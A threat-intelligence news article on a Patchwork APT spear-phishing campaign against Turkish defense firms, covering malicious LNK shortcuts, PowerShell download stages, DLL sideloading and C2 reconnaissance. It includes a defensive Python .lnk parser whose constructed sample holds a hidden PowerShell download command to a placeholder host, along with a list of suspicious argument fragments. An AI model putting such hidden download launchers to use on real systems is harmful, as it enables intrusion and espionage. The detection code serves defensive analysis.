Redazione RHC: 21 September 2025 20:53
The Patchwork group, also known by the aliases APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger, and Zinc Emerson, has launched a new spear-phishing campaign targeting the Turkish defense sector. The attackers’ primary goal, according to analysts, was to obtain sensitive information on developments in unmanned platforms and hypersonic weapons.
According to Arctic Wolf Labs, the attack chain consists of five stages and begins with the distribution of LNK (Windows shortcut) files disguised as invitations to an international conference on unmanned vehicles. These emails were addressed to employees of companies operating in the Turkish military-industrial complex, including a manufacturer of high-precision missiles.
The geopolitical context makes the attack particularly significant: its launch coincided with the deepening of military-technical cooperation between Turkey and Pakistan, as well as the escalation of the conflict between Pakistan and India. According to several analysts, Patchwork is acting in the interests of the Indian state and has been systematically attacking political and military targets in South Asian countries since 2009.
In early 2025, the same group launched a campaign against Chinese universities using energy-related documents as bait. It used a Rust-based downloader that decrypted and executed a C# Trojan known as Protego, designed to harvest data from infected computers.
The latest attack on Turkish defense organizations once again uses LNK files embedding PowerShell commands. The scripts initiate a connection to a remote server, expouav[.]org; the domain was registered on June 25, 2025, and is used as a payload distribution point. In addition to the malicious code, the site hosts a PDF document mimicking an international conference, ostensibly referencing a real event held on the WASET platform. This distracts the user with a visually believable "wrapper" while the scripts run in the background.
Further actions lead to the loading of a DLL via DLL sideloading, i.e., replacing a legitimate component in a trusted process. Its execution is triggered by a scheduled task in the Windows Task Scheduler, which launches the embedded shellcode. This module performs environmental reconnaissance: it collects system information, takes screenshots, and sends the data to the C2 server.
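As an added example from the defender's side (not code from the original article or from Arctic Wolf Labs), the following Python parses the Windows Shell Link (.lnk) format described in MS-SHLLINK, reads the target path, command-line arguments and ShowCommand fields, and flags shortcuts built to launch PowerShell in a hidden or minimised window, which is the initial stage of the chain described above. The two sample shortcuts are constructed inside the code (the URL is a placeholder, not the campaign's domain), and the list of suspicious argument fragments is an assumption chosen for illustration.

```python
import struct
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # MS-SHLLINK header CLSID, little-endian
HAS_IDLIST, HAS_LINKINFO, HAS_RELPATH, HAS_ARGS, IS_UNICODE = 0x01, 0x02, 0x08, 0x20, 0x80  # LinkFlags bits
SW_SHOWMINNOACTIVE = 7  # ShowCommand value: window starts minimised and inactive
STRING_FIELDS = ((0x04, "name"), (HAS_RELPATH, "relative_path"), (0x10, "working_dir"), (HAS_ARGS, "arguments"), (0x40, "icon"))  # fixed StringData order
SUSPICIOUS_ARGS = ("-w hidden", "-windowstyle hidden", "-enc", "-nop", "iwr ", "downloadstring", "http")  # assumed list, tune per environment

def parse_lnk(data: bytes) -> dict:
    # Read LinkFlags, ShowCommand and the StringData strings; skip the IDList and LinkInfo blocks.
    if len(data) < 76 or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    show_cmd, = struct.unpack_from("<I", data, 60)
    pos = 76
    if flags & HAS_IDLIST:    # IDListSize (2 bytes) excludes the size field itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:  # LinkInfoSize (4 bytes) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    info = {"flags": flags, "show_command": show_cmd}
    for bit, name in STRING_FIELDS:  # each string: CountCharacters, then the characters, no terminator
        if flags & bit:
            count, = struct.unpack_from("<H", data, pos)
            info[name] = data[pos + 2:pos + 2 + count * width].decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count * width
    return info

def triage_lnk(data: bytes) -> list:
    # Return the reasons a shortcut looks like a hidden PowerShell launcher (empty list = nothing found).
    info = parse_lnk(data)
    target = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    reasons = []
    if "powershell" in target or "pwsh" in target:
        reasons.append("target is PowerShell")
    if any(frag in target for frag in SUSPICIOUS_ARGS):
        reasons.append("hidden-window or download arguments")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE")
    return reasons

def build_sample_lnk(rel_path: str, args: str, show_cmd: int) -> bytes:
    # Construct a minimal .lnk (no IDList/LinkInfo) so the parser can be exercised offline.
    header = struct.pack("<I16sII", 0x4C, LNK_CLSID, HAS_RELPATH | HAS_ARGS | IS_UNICODE, 0) + b"\0" * 24
    header += struct.pack("<IIIHH", 0, 0, show_cmd, 0, 0) + b"\0" * 8  # FileSize, IconIndex, ShowCommand, HotKey, reserved
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + enc(rel_path) + enc(args)
# Constructed samples: a shortcut of the kind the article describes (placeholder URL) and a benign one.
DROPPER_LNK = build_sample_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                               '-w hidden -nop -c "iwr http://example.invalid/p"', SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_sample_lnk(r"..\..\Windows\System32\notepad.exe", "", 1)
```

Real shortcuts usually carry an IDList and LinkInfo block, which the parser skips by their declared sizes, so the same function works on files pulled from a mail gateway quarantine.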
A distinctive feature of the new operations is the use of 32-bit PE files instead of the previously used 64-bit DLLs. This indicates an evolution of the technical base and an attempt to increase the level of obfuscation: compact x86 binaries are easier to inject into trusted processes, and the architectural change complicates automatic threat detection.
Researchers also found evidence of overlap between Patchwork’s infrastructure and elements previously associated with the DoNot Team group (APT-Q-38, Bellyworm), which could indicate tactical or logistical cooperation between the two Indian APT clusters.
The campaign against the Turkish defense industry marks an expansion of Patchwork’s targeting, which previously focused on South Asia. Given Turkey’s key role in the drone market (the country accounts for approximately 65% of global exports) and its ambition to develop hypersonic weapons, the Indian cyberespionage group’s activities appear strategically motivated.